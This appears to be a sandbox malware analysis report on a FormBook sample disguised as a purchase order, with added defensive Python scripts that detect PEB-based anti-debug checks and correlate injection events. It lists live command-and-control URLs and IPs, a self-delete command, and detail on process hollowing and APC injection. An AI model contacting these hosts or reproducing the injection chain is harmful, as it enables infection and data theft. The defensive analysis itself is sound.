Source: C:\Windows\SysWOW64\ipconfig.exe  Code function: 5_2_02EF6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe  Code function: 5_2_02EF6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Code function: 0_2_013ED6DE __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Process token adjusted: Debug
Source: C:\Windows\SysWOW64\ipconfig.exe  Process token adjusted: Debug
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Code function: 0_2_013E605C SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Code function: 0_2_013E032D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Code function: 0_2_013DD3A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
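Every `mov eax, dword ptr fs:[00000030h]` above is a read of the 32-bit PEB pointer out of the TEB; the addresses (0x02E7xxxx to 0x02F4xxxx) sit far above ipconfig.exe's own image base of 0x140000, so these sites belong to the payload injected into ipconfig.exe. The sandbox signature fires on the load alone, which also matches benign CRT and loader code. What distinguishes an anti-debug check is the field read next: PEB+0x02 (BeingDebugged) and PEB+0x68 (NtGlobalFlag) are debugger checks, whereas PEB+0x0C (Ldr) is the start of the module walk behind "dynamically determine API calls". The scanner below is an added example, not code from the report or from Joe Sandbox: it finds the fs:[30h] load encodings in raw x86 bytes and classifies each by the first [reg+disp8] access that follows. The PEB offsets are the public x86 _PEB layout, the sample bytes are constructed for the example, and the byte-pattern approach is a heuristic (no disassembler), which is also how static sandbox signatures of this kind work.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Public x86 _PEB field offsets (assumed from the documented layout, not from the report).
PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x10: "ProcessParameters",
              0x18: "ProcessHeap", 0x68: "NtGlobalFlag"}
REG_NAMES = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# Encodings of the load the sandbox flags:
#   64 A1 30 00 00 00        mov eax, dword ptr fs:[30h]
#   64 8B /r 30 00 00 00     mov r32, dword ptr fs:[30h]   (ModRM mod=00, rm=101 -> disp32)
PEB_LOAD = re.compile(
    rb"\x64(?:\xA1|\x8B[\x05\x0D\x15\x1D\x25\x2D\x35\x3D])\x30\x00\x00\x00", re.DOTALL)


@dataclass
class PebAccess:
    offset: int                  # blob offset of the fs:[30h] load
    register: str                # register that receives the PEB pointer
    field_offset: Optional[int]  # disp8 of the first dereference, if one is found
    field: str                   # PEB field name for that disp8


def _first_field_access(window: bytes, reg: int) -> Optional[int]:
    """Return the disp8 of the first [reg+disp8] memory access in window, or None.

    Recognises mov r32,[reg+d8] (8B /r), movzx r32,byte [reg+d8] (0F B6 /r) and the
    group-1 byte ops such as cmp byte [reg+d8],imm8 (80 /n). ModRM mod=01 means a
    disp8 follows; rm=100 would introduce a SIB byte, so esp is never matched.
    """
    for i in range(len(window) - 2):
        op = window[i]
        if op in (0x8B, 0x80):
            modrm = window[i + 1]
            if modrm >> 6 == 1 and modrm & 7 == reg and reg != 4:
                return window[i + 2]
        elif op == 0x0F and window[i + 1] == 0xB6 and i + 3 < len(window):
            modrm = window[i + 2]
            if modrm >> 6 == 1 and modrm & 7 == reg and reg != 4:
                return window[i + 3]
    return None


def find_peb_accesses(code: bytes, window: int = 16) -> List[PebAccess]:
    """Locate every fs:[30h] load and classify it by the PEB field read right after it."""
    hits = []
    for m in PEB_LOAD.finditer(code):
        # A1 form always targets eax; the 8B form names the register in ModRM.reg.
        reg = 0 if code[m.start() + 1] == 0xA1 else (code[m.start() + 2] >> 3) & 7
        disp = _first_field_access(code[m.end(): m.end() + window], reg)
        field = "unresolved" if disp is None else PEB_FIELDS.get(disp, "offset 0x%X" % disp)
        hits.append(PebAccess(m.start(), REG_NAMES[reg], disp, field))
    return hits


def anti_debug_sites(hits: List[PebAccess]) -> List[PebAccess]:
    """Only the reads of BeingDebugged / NtGlobalFlag count as debugger checks."""
    return [h for h in hits if h.field in ("BeingDebugged", "NtGlobalFlag")]


def describe(hits: List[PebAccess], image_base: int = 0) -> List[str]:
    """Render hits in the same shape as the report's 'Code function' lines."""
    return ["%08X mov %s, dword ptr fs:[00000030h] -> PEB.%s"
            % (image_base + h.offset, h.register, h.field) for h in hits]


# Constructed x86 bytes for the example: a BeingDebugged check, an Ldr walk and an
# NtGlobalFlag check. The sandbox signature would flag all three loads identically.
SAMPLE_CODE = bytes.fromhex(
    "64a130000000"    # mov eax, fs:[30h]
    "0fb64002"        # movzx eax, byte ptr [eax+2]     -> PEB.BeingDebugged
    "85c0" "7502"     # test eax, eax ; jnz +2
    "33c0" "c3"       # xor eax, eax ; ret
    "648b0d30000000"  # mov ecx, fs:[30h]
    "8b410c" "c3"     # mov eax, [ecx+0Ch] ; ret         -> PEB.Ldr (API resolution)
    "64a130000000"    # mov eax, fs:[30h]
    "8b4068"          # mov eax, [eax+68h]               -> PEB.NtGlobalFlag
    "83e070" "c3"     # and eax, 70h ; ret
)

if __name__ == "__main__":
    found = find_peb_accesses(SAMPLE_CODE)
    print("\n".join(describe(found, image_base=0x02E70000)))
    print("debugger checks:", len(anti_debug_sites(found)), "of", len(found), "PEB reads")
```

Run against a dumped region (for instance the 0x02B00000 memory dump of process 5 that the Yara rule matched) rather than the on-disk sample, because the loads of interest live in injected memory, not in the dropper's image.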

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe  Network Connect: 52.58.78.16 80
Source: C:\Windows\explorer.exe  Network Connect: 194.35.122.226 80
Source: C:\Windows\explorer.exe  Network Connect: 185.201.11.126 80
Source: C:\Windows\explorer.exe  Network Connect: 3.134.22.63 80
Source: C:\Windows\explorer.exe  Network Connect: 160.153.136.3 80
Source: C:\Windows\explorer.exe  Network Connect: 103.224.182.242 80
Source: C:\Windows\explorer.exe  Network Connect: 104.253.79.71 80
Source: C:\Windows\explorer.exe  Network Connect: 52.71.133.130 80
Source: C:\Windows\explorer.exe  Network Connect: 3.12.202.18 80
Source: C:\Windows\explorer.exe  Network Connect: 35.246.6.109 80
Source: C:\Windows\explorer.exe  Network Connect: 154.86.218.70 80
Source: C:\Windows\explorer.exe  Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe  Network Connect: 13.226.173.80 80

Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Section loaded: unknown target: C:\Users\user\Desktop\Purchase Order 40,7045$.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\ipconfig.exe  Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\ipconfig.exe  Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Thread register set: target process: 3292
Source: C:\Windows\SysWOW64\ipconfig.exe  Thread register set: target process: 3292

Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Thread APC queued: target process: C:\Windows\explorer.exe

Sample uses process hollowing technique
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 140000
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Process created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe C:\Users\user\Desktop\Purchase Order 40,7045$.exe
Source: C:\Windows\SysWOW64\ipconfig.exe  Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
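The lines above describe one injection chain: the dropper re-launches itself, unmaps ipconfig.exe's image at its base 0x140000 and maps an executable section in its place (hollowing), maps executable memory into explorer.exe and queues an APC there, and explorer.exe (a Windows binary that has no business contacting these hosts) then makes the thirteen outbound connections; finally ipconfig.exe spawns cmd.exe to delete the original file. Note that the "Thread register set" events name their target only by PID 3292, so the report does not itself tie the context change to ipconfig.exe. The correlation below is an added example, not report code: it parses the report's own signature lines (abridged to three of the explorer.exe connections) and reduces them to the three verdicts an analyst wants, which processes were hollowed, which received an APC, and which system process went online after being injected into. The parser tolerates the missing space between the source path and the event label that the report text shows.

```python
import re
from collections import defaultdict

# Signature lines copied from the report above (three of the thirteen explorer.exe
# connections are kept). The source path and the event label are fused in the report,
# so EVENT_RE allows zero or more spaces after ".exe".
REPORT_LINES = r"""
Source: C:\Windows\explorer.exeNetwork Connect: 52.58.78.16 80
Source: C:\Windows\explorer.exeNetwork Connect: 194.35.122.226 80
Source: C:\Windows\explorer.exeNetwork Connect: 185.201.11.126 80
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeSection loaded: unknown target: C:\Users\user\Desktop\Purchase Order 40,7045$.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeThread register set: target process: 3292
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeThread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 140000
Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
""".strip().splitlines()

EVENT_RE = re.compile(
    r"^Source: (?P<src>.+?\.exe)\s*"
    r"(?P<event>Section loaded|Section unmapped|Thread register set|Thread APC queued"
    r"|Network Connect|Process created): (?P<rest>.*)$"
)


def is_windows_binary(path: str) -> bool:
    """Binaries under C:\\Windows are injection targets here, never the injector's own image."""
    return path.lower().startswith("c:\\windows\\")


def analyze(lines):
    """Correlate injection primitives per target with later network and cleanup activity."""
    primitives = defaultdict(set)   # target (image path or PID) -> {(primitive, source)}
    connects = defaultdict(list)    # process image -> [(ip, port)]
    cleanup = []                    # (spawning process, command line) for self-deletion
    for line in lines:
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        src, event, rest = m.group("src", "event", "rest")
        if event == "Section loaded":
            t = re.match(r"unknown target: (.+?) protection: (.+)$", rest)
            if t and "execute" in t.group(2):          # only executable mappings matter
                primitives[t.group(1)].add(("exec-map", src))
        elif event == "Section unmapped":
            t = re.match(r"(.+?) base address: [0-9A-Fa-f]+$", rest)
            if t:
                primitives[t.group(1)].add(("unmap", src))
        elif event == "Thread APC queued":
            primitives[rest.split("target process: ", 1)[1]].add(("apc", src))
        elif event == "Thread register set":
            # The report names this target by PID only; keep the PID string as the key.
            primitives[rest.split("target process: ", 1)[1]].add(("thread-context", src))
        elif event == "Network Connect":
            ip, port = rest.split()
            connects[src].append((ip, int(port)))
        elif event == "Process created" and re.search(r"cmd\.exe\s+/c\s+del\b", rest, re.I):
            cleanup.append((src, rest))

    kinds = {target: {p for p, _ in s} for target, s in primitives.items()}
    return {
        # unmap of the image plus an executable mapping in its place = hollowing
        "hollowed": sorted(t for t, k in kinds.items() if {"unmap", "exec-map"} <= k),
        # executable mapping plus a queued APC = APC injection
        "apc_injected": sorted(t for t, k in kinds.items() if {"apc", "exec-map"} <= k),
        # Windows binaries that were injected into and then connected out
        "system_process_network": {proc: len(c) for proc, c in connects.items()
                                   if is_windows_binary(proc) and proc in primitives},
        "injectors": sorted({s for v in primitives.values() for _, s in v}),
        "cleanup": cleanup,
    }


if __name__ == "__main__":
    for key, value in analyze(REPORT_LINES).items():
        print(key, "=", value)
```

The same correlation transfers to EDR telemetry (NtUnmapViewOfSection / NtMapViewOfSection with an executable protection, NtSetContextThread, NtQueueApcThread, then a socket from the target) provided the target is keyed by PID throughout; the sandbox's PID-only "Thread register set" line is exactly the kind of gap that breaks the chain if image paths and PIDs are mixed.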
Source: explorer.exe, 00000002.00000000.242800497.0000000001400000.00000002.00000001.sdmp, ipconfig.exe, 00000005.00000002.505838974.0000000004340000.00000002.00000001.sdmp  Binary or memory string: uProgram Manager
Source: explorer.exe, 00000002.00000000.254074114.0000000005F40000.00000004.00000001.sdmp, ipconfig.exe, 00000005.00000002.505838974.0000000004340000.00000002.00000001.sdmp  Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.242800497.0000000001400000.00000002.00000001.sdmp, ipconfig.exe, 00000005.00000002.505838974.0000000004340000.00000002.00000001.sdmp  Binary or memory string: Progman
Source: explorer.exe, 00000002.00000002.501463213.0000000000EB8000.00000004.00000020.sdmp  Binary or memory string: ProgmanX
Source: explorer.exe, 00000002.00000000.242800497.0000000001400000.00000002.00000001.sdmp, ipconfig.exe, 00000005.00000002.505838974.0000000004340000.00000002.00000001.sdmp  Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.258557851.0000000008ACF000.00000004.00000001.sdmp  Binary or memory string: Shell_TrayWndAj
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Code function: GetLocaleInfoA,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Code function: ___getlocaleinfo (88 consecutive calls),
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe  Code function: 0_2_013DC26F GetSystemTimeAsFileTime,__aulldiv,

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match  File source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match  File source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

The matrix is reproduced here one tactic per line. Trailing digits are the per-technique signature count badges from the report, run together by text extraction; techniques without a badge are the matrix's fixed grid and were not observed.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Native API1; Shared Modules1; At (Linux); At (Windows); Cron; Launchd; Scheduled Task
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Privilege Escalation: Process Injection512; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Defense Evasion: Virtualization/Sandbox Evasion2; Process Injection512; Deobfuscate/Decode Files or Information1; Obfuscated Files or Information3; Software Packing1; Steganography; Compile After Delivery
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: System Time Discovery1; Security Software Discovery141; Virtualization/Sandbox Evasion2; Process Discovery2; Remote System Discovery1; System Network Configuration Discovery1; System Information Discovery112
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Archive Collected Data1; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Command and Control: Encrypted Channel1; Ingress Tool Transfer3; Non-Application Layer Protocol3; Application Layer Protocol3; Fallback Channels; Multiband Communication; Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact

Behavior Graph

Legend:

• Process
• Signature
• Created File
• DNS/IP Info
• Is Dropped
• Is Windows Process
• Number of created Registry Values
• Number of created Files
• Visual Basic
• Delphi
• Java
• .Net C# or VB.NET
• C, C++ or other language
• Is malicious
• Internet

Behavior Graph ID: 321097  Sample: Purchase Order 40,7045$.exe  Start date: 20/11/2020  Architecture: WINDOWS  Score: 100

Process tree, with the DNS/IP and signature annotations attached to each node in the graph:

Start
  DNS/IP: www.handsfreedocs.com; www.lotoencasa.com
  Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 7 other signatures
  Purchase Order 40,7045$.exe (started)
    Signatures: Maps a DLL or memory area into another process
    Purchase Order 40,7045$.exe (started)
      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
      explorer.exe (injected)
        DNS/IP: www.realitytvstockwatch.com 103.224.182.242, ports 49761 -> 80, TRELLIAN-AS-AP Trellian Pty Limited (AU), Australia; searchnehomes.com 34.102.136.180, ports 49763 -> 80, GOOGLE (US), United States; 22 other IPs or domains
        Signatures: System process connects to network (likely due to code injection or exploit)
        ipconfig.exe (started)
          Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          cmd.exe 1 (started)
            conhost.exe (started)


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
Purchase Order 40,7045$.exe | 43% | Virustotal | -
Purchase Order 40,7045$.exe | 36% | ReversingLabs | -
Purchase Order 40,7045$.exe | 100% | Avira | TR/AD.Swotter.vxbef
Purchase Order 40,7045$.exe | 100% | Joe Sandbox ML | -

          Dropped Files

          No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
0.2.Purchase Order 40,7045$.exe.2f40000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.2.Purchase Order 40,7045$.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

Domains

Source | Detection | Scanner | Label
sweetbasilmarketing.com | 2% | Virustotal | -

URLs

Source | Detection | Scanner | Label
http://www.the-gongs.com/igqu/?7nExDDz=86BqMRXKwVnGWLvcWU9i/TAM/7rVhuijReL1UQww2BMw3v63ywTnKR2tmrSinvnZEbGuhDJZ6g==&znedzJ=zZ08lr | 0% | Avira URL Cloud | safe
http://www.sweetbasilmarketing.com/igqu/?7nExDDz=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&znedzJ=zZ08lr | 0% | Avira URL Cloud | safe
http://www.fahufu.com/igqu/?7nExDDz=e47LXRShpINFItPSGlU3D/kbksa3SWNeF5M0wKVSE3MTkWZptzimgsXyJgV91SEk9qVnlKbrpg==&znedzJ=zZ08lr | 0% | Avira URL Cloud | safe
http://www.hemparcade.com/ | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation (3 entries) | safe
http://www.ariasu-nakanokaikei.com/igqu/?7nExDDz=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xhGCB9WO75ae6tE3A==&znedzJ=zZ08lr | 0% | Avira URL Cloud | safe
http://yuyabo.com/ | 0% | Avira URL Cloud | safe
http://www.realitytvstockwatch.com/igqu/?7nExDDz=rdOgkBqGTQXOs3KWXTswN+BO77q1iYhhtKfbkpaHvFu47hc7CbfKDDDhaf9YD51rtmp9fiqQ6Q==&znedzJ=zZ08lr | 0% | Avira URL Cloud | safe
http://www.hemparcade.com | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation (3 entries) | safe
http://www.hemparcade.com/igqu/?7nExDDz=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98Qm7USnQA3DnFd91lQ==&znedzJ=zZ08lr | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr | 0% | URL Reputation (3 entries) | safe
http://www.placeduconfort.com/igqu/?7nExDDz=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MMbYjLc/Z57ALjfzyA==&znedzJ=zZ08lr | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation (3 entries) | safe
http://www.sajatypeworks.com | 0% | URL Reputation (3 entries) | safe
http://www.maninhatphoto.com/igqu/?7nExDDz=UfiOKa10s1yLusAItF3vWjkwpymqUGezPxY1yDNv0p/2lCJES87tx2Jt/J4nqwS7zvQC3NAVFw==&znedzJ=zZ08lr | 0% | Avira URL Cloud | safe
http://www.typography.netD | 0% | URL Reputation (3 entries) | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation (3 entries) | safe
http://www.heartandcrowncloset.com/igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lr | 0% | Avira URL Cloud | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation (3 entries) | safe
http://www.happinestbuilders.com/igqu/?7nExDDz=nB3I2im5F8HSwElcMB6r2r7aYFb3l14g4Fl69Fm1UyuWMpfJzwOjmqIJuIfJqip3lhGwdegm9w==&znedzJ=zZ08lr | 0% | Avira URL Cloud | safe
http://fontfabrik.com | 0% | URL Reputation (3 entries) | safe
http://www.founder.com.cn/cn | 0% | URL Reputation (3 entries) | safe
http://www.searchnehomes.com/igqu/?7nExDDz=HPW2WyZF3+vAEuPCsfs94a0V0pGSpSCTGdq4luVMg5IcQk4WROkoYp4gl4PZZku0mN/660XlTQ==&znedzJ=zZ08lr | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation (3 entries) | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation (3 entries) | safe
http://www.justsoldbykristen.com/igqu/?7nExDDz=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEB+QG0mLIMq1kVYlzw==&znedzJ=zZ08lr | 0% | Avira URL Cloud | safe
http://www.sandoll.co.kr | 0% | URL Reputation (3 entries) | safe
http://www.urwpp.deDPlease | 0% | URL Reputation (3 entries) | safe
http://www.shopnicknaks.com/igqu/?7nExDDz=93/Rz74I7LmyoPrfkHQz5Aq7QtSit3A8iuxJ0AYKOw4Fhqt5y6XHOpUvAHedIRknYvzWThccTQ==&znedzJ=zZ08lr | 0% | Avira URL Cloud | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation (3 entries) | safe
http://www.sakkal.com | 0% | URL Reputation (3 entries) | safe

